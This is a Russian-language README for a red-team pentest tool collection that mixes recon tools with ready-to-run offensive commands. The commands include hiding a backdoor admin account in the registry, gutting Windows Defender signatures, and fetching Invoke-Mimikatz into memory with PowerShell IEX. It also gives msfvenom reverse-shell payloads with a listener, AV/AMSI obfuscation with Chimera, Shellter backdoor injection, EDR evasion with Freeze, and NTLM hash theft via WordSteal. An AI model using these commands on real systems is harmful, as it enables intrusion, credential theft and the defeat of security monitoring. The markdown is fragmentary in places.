
Проект, объединяющий несколько инструментов для пентеста.
Этот репозиторий содержит коллекцию из 200+ инструментов и ресурсов, которые могут быть полезны для деятельности красной команды.
Некоторые из инструментов могут быть специально разработаны для красной команды, в то время как другие являются более универсальными и могут быть адаптированы для использования в контексте красной команды.
Предупреждение
Материалы в этом репозитории предназначены только для информационных и образовательных целей. Они не предназначены для использования в незаконной деятельности.
Примечание
Скрывайте заголовки списка инструментов с помощью стрелки.
Нажмите 🔙, чтобы вернуться к списку.
git submodule update --init --recursive
### Добавить новый проект```bash
git submodule add https://github.com/example.git
docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules
Учитесь у Red Team'еров с помощью сборника советов по Red Team. Эти советы охватывают спектр тактик, инструментов и методологий для улучшения ваших навыков работы в Red Team.
Примечание: Почти все советы предоставлены @Alh4zr3d, он публикует хорошие советы по Red Team!
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**Описание:** _'Создание учетных записей рискованно при уклонении от синих, но при создании локального администратора используйте немного милого колдовства в реестре, чтобы скрыть его.'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)Отключение Windows Defender путем удаления сигнатур```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Описание: 'Немного запутанно, но если Windows Defender доставляет вам серьезную головную боль, вместо того чтобы отключать его (что предупреждает пользователя), лучше просто обезвредить его, удалив все сигнатуры.'
Автор: @Alh4zr3d
Ссылка: Twitter
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**Описание:** _'Иногда вы хотите войти на хост через RDP или подобное, но у вашего пользователя есть активная сессия. Включите несколько сессий на одного пользователя.'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)Sysinternals PsExec.exe локальная альтернатива```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Описание: «Надоело загружать Sysinternals PsExec.exe при боковом перемещении? У Windows есть лучшая альтернатива, предустановленная. Попробуйте это вместо неё.»
Автор: @GuhnooPlusLinux
Ссылка: Twitter
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**Описание:** _'По возможности используйте встроенные средства, а не загружайте инструменты на машины (по многим причинам). Помогают PowerShell/.NET. Пример: простой сканер портов в Powershell.'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)С поддержкой прокси PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
Описание: «В наши дни большинство крупных организаций используют веб-прокси. Стандартная загрузочная оболочка PowerShell не поддерживает прокси. Используйте эту.»
Автор: @Alh4zr3d
Ссылка: Twitter
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**Описание:** _'Вы удивитесь, что можно узнать только из закладок пользователя. Например, внутренние конечные точки, к которым у них есть доступ.'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)Выполнить запрос DNS-записей для перечисления```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
Описание: 'Разведка — это 95% игры. Однако запуск множества сканов для оценки среды очень шумный. Почему бы просто не спросить у DC/DNS-сервера все DNS-записи?'
Автор: @Alh4zr3d
Ссылка: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**Описание:** _'Поиск незакавыченных путей сервисов без PowerUp'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)Обход заблокированной командной строки с помощью /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
Описание: 'This command prompt has been disabled by your administrator...' Обычно можно увидеть в таких средах, как киоски ПК. Быстрый хакерский обходной путь — использовать /k через окно запуска Windows. Это выполнит команду, а затем покажет сообщение об ограничении, позволяя выполнять команды.
Автор: Martin Sohn Christensen
Ссылка: Блог
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**Описание:** _'Устали от того, что Защитник Windows удаляет mimikatz.exe? Попробуйте это вместо этого.'_
**Автор:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**Ссылка:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)Проверьте, находитесь ли вы в виртуальной машине```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
Описание: 'Хотите узнать, находитесь ли вы в виртуальной машине? Запросите ключи реестра и узнайте!!! Если появятся какие-либо результаты, значит вы в виртуальной машине.'
Автор: @dmcxblue
Ссылка: Twitter
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**Описание:** _'AppLocker может быть болезненным. Перечислите, чтобы увидеть, насколько это больно'_
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
# Разведка
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
Я собрал однострочник на bash, который:
- Пассивно собирает список поддоменов из сертификатных ассоциаций ([crt.sh](https://crt.sh/))
- Активно запрашивает каждый поддомен для проверки его существования ([httprobe](https://github.com/tomnomnom/httprobe))
- Активно делает скриншоты каждого поддомена для ручной проверки ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**Использование:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains


Закладка JavaScript для извлечения всех ссылок конечных точек на веб-странице.
Созданный @renniepak, этот фрагмент кода JavaScript можно использовать для извлечения всех конечных точек (начинающихся с /) из DOM текущей веб-страницы, включая все внешние источники скриптов, встроенные на веб-страницу.```javascript
javascript: (function () {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;
const results = new Set();
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t &&
fetch(t)
.then(function (t) {
return t.text();
})
.then(function (t) {
var e = t.matchAll(regex);
for (let r of e) results.add(r[0]);
})
.catch(function (t) {
console.log("An error occurred: ", t);
});
}
var pageContent = document.documentElement.outerHTML,
matches = pageContent.matchAll(regex);
for (const match of matches) results.add(match[0]);
function writeResults() {
results.forEach(function (t) {
document.write(t + "
");
});
}
setTimeout(writeResults, 3e3);
})();
**Использование (букмарклет)**
Создайте букмарклет...
- `Щелкните правой кнопкой мыши по панели закладок`
- `Нажмите 'Добавить страницу'`
- `Вставьте приведенный выше JavaScript в поле 'url'`
- `Нажмите 'Сохранить'`
...затем перейдите на страницу жертвы в браузере и нажмите на букмарклет.

**Использование (Консоль)**
Вставьте приведенный выше JavaScript в окно консоли `F12` и нажмите Enter.

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
Быстрый сканер уязвимостей, который использует .yaml шаблоны для поиска конкретных проблем.
**Установка:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Использование:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Составленный сообществом список шаблонов для движка nuclei для поиска уязвимостей в приложениях.</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">Документация</a> •
<a href="#-contributions">Вклад</a> •
<a href="#-discussion">Обсуждение</a> •
<a href="#-community">Сообщество</a> •
<a href="https://nuclei.projectdiscovery.io/faq/templates/">Часто задаваемые вопросы</a> •
<a href="https://discord.gg/projectdiscovery">Присоединиться к DC</a>
</p>
---
Шаблоны являются основой [сканера nuclei](https://github.com/projectdiscovery/nuclei), который обеспечивает работу механизма сканирования.
Этот репозиторий хранит и содержит различные шаблоны для сканера, предоставленные нашей командой, а также сообществом.
Мы надеемся, что вы тоже внесете вклад, отправляя шаблоны через **pull requests** или [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), чтобы расширить список.
## Обзор Nuclei Templates
Обзор проекта шаблонов nuclei, включая статистику по уникальным тегам, авторам, директориям, уровню серьезности и типу шаблонов. Таблица ниже содержит десять лучших статистик для каждого параметра; расширенная версия [доступна здесь](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md), а также в формате [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) для интеграции.
<table>
<tr>
<td>
## Топ-10 статистик шаблонов Nuclei
| ТЕГ | КОЛ-ВО | АВТОР | КОЛ-ВО | ДИРЕКТОРИЯ | КОЛ-ВО | СЕРЬЕЗНОСТЬ | КОЛ-ВО | ТИП | КОЛ-ВО |
| --------- | ------ | ----------- | ------ | --------------------- | ------ | ----------- | ------ | --- | ------ |
| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 |
| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 |
| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | |
| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | |
| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | |
| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | |
| osint | 639 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 596 | ritikchaddha| 210 | contributors.json | 1 | | | | |
| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | |
**404 директории, 6542 файла**.
</td>
</tr>
</table>
## 📖 Документация
Пожалуйста, перейдите на https://nuclei.projectdiscovery.io для подробной документации по **созданию** новых или **собственных** шаблонов.
Мы также добавили набор шаблонов, чтобы помочь вам понять, как все работает.
## 💪 Вклад
Nuclei-templates работает благодаря значительному вкладу сообщества.
[Вклад шаблонов](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Запросы функций](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) и [Сообщения об ошибках](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) очень приветствуются.

## 💬 Обсуждение
Есть вопросы / сомнения / идеи для обсуждения? Не стесняйтесь открыть обсуждение на доске [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions).
## 👨💻 Сообщество
Приглашаем вас присоединиться к активному [сообществу Discord](https://discord.gg/projectdiscovery), чтобы обсудить напрямую с разработчиками проекта и поделиться с другими вопросами безопасности и автоматизации.
Кроме того, вы можете подписаться на нас в [Twitter](https://twitter.com/pdnuclei), чтобы быть в курсе всего, что связано с Nuclei.
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
Еще раз спасибо за ваш вклад и поддержание активности этого сообщества. :heart:
### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff — это наблюдатель за ключевыми словами в логах Certificate Transparency, написанный мной на Python. Он использует библиотеку certstream для отслеживания логов создания сертификатов, содержащих ключевые слова, определенные в файле. Вы можете запустить его с несколькими ключевыми словами, относящимися к вашему домену-жертве; любые создания сертификатов будут записаны и могут привести к обнаружению доменов, о которых вы ранее не знали.
**Установка:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
Использование:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
Отличный инструмент для перебора путей к файлам/папкам на целевом веб-сайте.
**Установка:**```bash
sudo apt install gobuster
Использование:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
Инструмент, предназначенный для выполнения принудительного просмотра (Forced Browsing) — атаки, цель которой перечислять и получать доступ к ресурсам, на которые нет ссылок в веб-приложении, но которые всё ещё доступны злоумышленнику.
Feroxbuster использует метод грубой силы в сочетании со списком слов для поиска несвязанного контента в целевых каталогах. Эти ресурсы могут хранить конфиденциальную информацию о веб-приложениях и операционных системах, такую как исходный код, учётные данные, адреса внутренней сети и т.д.
**Установка: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
Установка: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**Установка: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
Полные инструкции по установке см. здесь.
Использование:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
Полные примеры использования можно найти [здесь](https://epi052.github.io/feroxbuster-docs/docs/examples/).

_Изображение взято с https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif_
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
Инструмент для поиска инфраструктуры, файлов и приложений компании (цели) на крупнейших облачных провайдерах (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
Возможности:
- Обнаружение облачных сервисов (IPINFO API и исходный код)
- Высокая скорость (многопоточность)
- Кроссплатформенность (Windows, Linux, Mac)
- Рандомизация User-Agent
- Рандомизация прокси (HTTP, Socks5)
**Установка:**
Загрузите последний [релиз](https://github.com/0xsha/CloudBrute/releases) для вашей системы и следуйте инструкциям по использованию.
**Использование:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Изображение взято с https://github.com/0xsha/CloudBrute
dnsrecon — это инструмент на pyhton для перечисления DNS-записей (MX, SOA, NS, A, AAAA, SPF и TXT) и может предоставить ряд новых связанных хостов-жертв для перехода от одного поиска домена.
Установка:```bash sudo apt install dnsrecon
**Использование:**```bash
dnsrecon -d google.com

Shodan сканирует общедоступную инфраструктуру и отображает её в формате, доступном для поиска. Используя название компании, доменное имя или IP-адрес, можно обнаружить потенциально уязвимые системы, связанные с вашей целью, через shodan.

Инструмент для перечисления поддоменов, перечисления DNS, обнаружения WAF, WHOIS, сканирования портов, Wayback Machine, сбора email-адресов.
Установка:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**Использование:**```python
python3 AORT.py -d google.com

Программа, которая проверяет, можно ли подделать домен. Она проверяет SPF и DMARC записи на наличие слабых конфигураций, допускающих подделку. Кроме того, программа предупредит, если домен имеет DMARC конфигурацию, которая отправляет почту или HTTP-запросы при неудачных SPF/DKIM письмах.
Домены можно подделать, если выполняется любое из следующих условий:
~all или -allp=none или отсутствуетУстановка:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**Использование:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDump — это инструмент для быстрого перечисления AWS S3-бакетов с целью поиска интересных файлов. Он похож на брутфорсер поддоменов, но специально предназначен для S3-бакетов и имеет дополнительные возможности, позволяющие выполнять grep по файлам, а также загружать интересующие файлы.
Установка:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**Использование:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
Отличный инструмент для поиска информации на GitHub с помощью регулярных выражений, с возможностью поиска по конкретным пользователям GitHub и/или проектам.
Установка:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**Использование:**```
./githarvester.py
TruffleHog — это инструмент, который сканирует git-репозитории и ищет строки и шаблоны с высокой энтропией, которые могут указывать на наличие секретов, таких как пароли и API-ключи. С помощью TruffleHog вы можете быстро и легко найти конфиденциальную информацию, которая могла быть случайно зафиксирована и отправлена в репозиторий.
Установка (бинарные файлы): Ссылка
Установка (Go):
go install github.com/trufflesecurity/trufflehog/v3@latest
git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**Использование:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismap — это инструмент для обнаружения и идентификации активов. Он позволяет быстро определять протоколы и сигнатурную информацию, такую как web/tcp/udp, локализовать типы активов и подходит для внутренних и внешних сетей.
Dismap имеет полную базу сигнатурных правил, которая в настоящее время включает сигнатуры протоколов tcp/udp/tls и более 4500 правил для веб-сигнатур, позволяя идентифицировать favicon, body, header и другие элементы.
Установка:
Dismap представляет собой бинарный файл для Linux, macOS и Windows. Перейдите на страницу Release, чтобы скачать соответствующую версию и запустить:```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**Использование:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

Изображение взято с https://github.com/zhzyker/dismap
Инструмент для сбора информации из систем Windows и Samba.
Может использоваться для получения широкого спектра информации, включая:
Установка: (Apt)```bash sudo apt install enum4linux
**Установка: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
Использование:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

_Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/_
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
Dangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in rust.
You will need a subdomains file. _E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.
**Install:**
Download the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
Использование:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

_Изображение взято из https://github.com/Esc4iCEscEsc/skanuvaty_
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigor — это инструмент для сбора разведданных, его цель — выполнять задачи OSINT и не только, но без какого-либо API-ключа.
**Основные возможности:**
- Поиск информации об IP-адресе, ASN и организации.
- Обёртка для более эффективного запуска rustscan, masscan и nmap на IP/CIDR.
- Поиск дополнительных связанных доменов цели с помощью различных методов (сертификаты, whois, Google Analytics и т.д.).
- Получение сводки об IP-адресе (на базе [@thebl4ckturtle](https://github.com/theblackturtle))
**Установка:**```bash
go install github.com/j3ssie/metabigor@latest
Использование:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

_Изображение взято из https://github.com/j3ssie/metabigor_
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob — это инструмент, который помогает находить потенциально конфиденциальные файлы, отправленные в публичные репозитории на Github.
Gitrob клонирует репозитории, принадлежащие пользователю или организации, на заданную глубину, перебирает историю коммитов и помечает файлы, которые соответствуют сигнатурам потенциально конфиденциальных файлов.
Результаты представляются через веб-интерфейс для удобного просмотра и анализа.
**Примечание:** Gitrob потребует токен доступа Github для взаимодействия с Github API. [Создайте личный токен доступа](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) и сохраните его в переменной окружения в вашем .bashrc или аналогичном файле конфигурации оболочки:```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
Установка: (Go)```bash go get github.com/michenriksen/gitrob
**Установка: (Бинарный)**
[Предварительно скомпилированная версия](https://github.com/michenriksen/gitrob/releases) доступна для каждого релиза.
**Использование:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

Изображение взято с https://www.uedbox.com/post/58828/
Gowitness — это утилита для создания скриншотов веб-сайтов, написанная на Golang. Она использует Chrome Headless для создания снимков веб-интерфейсов из командной строки, а также имеет удобный просмотрщик отчетов для обработки результатов. Поддерживаются Linux и macOS, а также частично поддерживается Windows.
Установка: (Go)```bash go install github.com/sensepost/gowitness@latest
Полная информация об установке доступна [здесь](https://github.com/sensepost/gowitness/wiki/Installation).
**Использование:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
Полную информацию об использовании можно найти здесь.

Изображение взято с https://github.com/sensepost/gowitness
Chimera — это скрипт обфускации PowerShell, предназначенный для обхода AMSI и антивирусных решений. Он обрабатывает вредоносные PS1-файлы, известные тем, что вызывают срабатывание AV, и использует подстановку строк и конкатенацию переменных для обхода распространённых сигнатур обнаружения.
Установка:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**Использование:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Msfvenom позволяет создавать нагрузки для различных операционных систем в широком спектре форматов. Он также поддерживает обфускацию нагрузок для обхода антивирусов.
Настройка слушателя```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### Команды Msfvenom
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellter — это динамический инструмент для внедрения шеллкода и первый по-настоящему динамический инжектор PE-файлов.
Он может использоваться для внедрения шеллкода в нативные приложения Windows (в настоящее время только 32-битные приложения).
Shellter использует оригинальную структуру PE-файла и не применяет никаких модификаций, таких как изменение прав доступа к памяти в секциях (если только пользователь не захочет этого), добавление дополнительной секции с доступом RWE и тому подобных действий, которые могли бы выглядеть подозрительно при сканировании антивирусом.
Полную информацию из README можно найти здесь.
Установка: (Kali)```bash apt-get update apt-get install shellter
**Установка: (Windows)**
Посетите [страницу загрузки](https://www.shellterproject.com/download/) и установите.
**Использование:**
Просто выберите легитимный бинарный файл для внедрения бэкдора и запустите Shellter.
Некоторые полезные советы можно найти [здесь](https://www.shellterproject.com/tipstricks/).
Множество демонстраций использования сообществом можно найти [здесь](https://www.shellterproject.com/shellter-community-demos/).

_Изображение взято с https://www.kali.org/tools/shellter/images/shellter.png_
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freeze — это инструмент создания полезной нагрузки, используемый для обхода средств защиты EDR с целью выполнения шеллкода скрытным образом.
Freeze использует множество техник для не только удаления пользовательских перехватчиков EDR, но и выполнения шеллкода таким образом, чтобы обходить другие средства мониторинга конечных точек.
**Установка:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
Использование:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

_Изображение использовано с https://www.blackhatethicalhacking.com/tools/freeze/_
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
Этот скрипт создаст документ Microsoft Word с удаленным изображением, что позволит захватывать хеши NTML с удаленной конечной точки жертвы.
Microsoft Word имеет возможность включать изображения из удаленных мест, в том числе удаленное изображение, размещенное на SMB-сервере, контролируемом злоумышленником. Это дает вам возможность прослушивать и захватывать хеши NTLM, которые отправляются, когда аутентифицированная жертва открывает документ Word и отображает изображение.
**Установка:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
Использование:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

_Изображение взято с https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_
---
### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)
Если вы хотите узнать больше о методах, используемых в этом фреймворке, обратитесь к блогу SourceZero и оригинальному инструменту.
**Описание:**
Freeze.rs — это инструмент для создания полезных нагрузок, используемый для обхода средств защиты EDR с целью выполнения шелл-кода скрытным образом. Freeze.rs использует несколько методов не только для удаления пользовательских хуков EDR, но и для выполнения шелл-кода таким образом, чтобы обойти другие средства мониторинга конечных точек.
**Создание приостановленного процесса:**
Когда процесс создается, Ntdll.dll загружается первой; это происходит до загрузки любых DLL EDR. Это означает, что есть небольшая задержка перед тем, как EDR может быть загружен и начать перехватывать и модифицировать ассемблер системных DLL. При изучении системных вызовов Windows в Ntdll.dll мы можем увидеть, что ничего еще не перехвачено. Если мы создаем процесс в приостановленном состоянии (замороженный во времени), мы можем увидеть, что никакие другие DLL не загружены, кроме Ntdll.dll. Также можно заметить, что DLL EDR не загружены, что означает, что системные вызовы, расположенные в Ntdll.dll, не модифицированы.

**Рандомизация адресного пространства (ASLR)**
